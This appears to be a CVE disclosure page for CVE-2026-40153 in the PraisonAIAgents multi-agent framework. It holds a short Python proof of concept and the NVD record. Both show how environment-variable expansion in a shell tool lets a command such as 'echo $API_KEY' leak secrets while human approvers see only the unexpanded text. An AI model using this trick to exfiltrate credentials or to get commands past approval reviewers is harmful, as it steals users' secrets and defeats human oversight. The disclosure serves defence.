CVE-2026-40153

# PoC for CVE-2026-40153 # This demonstrates the environment variable expansion vulnerability. import os def vulnerable_execute_command(command_args): # Simulates the vulnerable code in shell_tools.py line 64 # It expands environment variables regardless of shell=False expanded_args = [os.path.expandvars(arg) for arg in command_args] # Log what the reviewer sees vs what executes print(f"[Reviewer View] Command: {' '.join(command_args)}") print(f"[Execution View] Command: {' '.join(expanded_args)}") # In the real scenario, this would execute: subprocess.run(expanded_args, shell=False) return expanded_args # Setup: Assume a sensitive secret exists in the environment os.environ['DATABASE_URL'] = 'postgres://admin:[email protected]:5432/mydb' os.environ['API_KEY'] = 'sk-1234567890abcdef' # Attack Scenario: Attacker requests to echo a variable # The reviewer sees "echo $API_KEY" and thinks it's just text. malicious_input = ["echo", "The", "key", "is:", "$API_KEY"] print("--- Testing Vulnerability ---") vulnerable_execute_command(malicious_input)

{"cve": {"id": "CVE-2026-40153", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:36.350", "lastModified": "2026-04-20T19:55:29.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the execute_command function in shell_tools.py calls os.path.expandvars() on every command argument at line 64, manually re-implementing shell-level environment variable expansion despite using shell=False (line 88) for security. This allows exfiltration of secrets stored in environment variables (database credentials, API keys, cloud access keys). The approval system displays the unexpanded $VAR references to human reviewers, creating a deceptive approval where the displayed command differs from what actually executes. This vulnerability is fixed in 1.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-526"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.128", "matchCriteriaId": "B1797C27-7EBC-4CEF-90B8-F84E8198632D"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v8g7-9q6v-p3x8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v8g7-9q6v-p3x8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}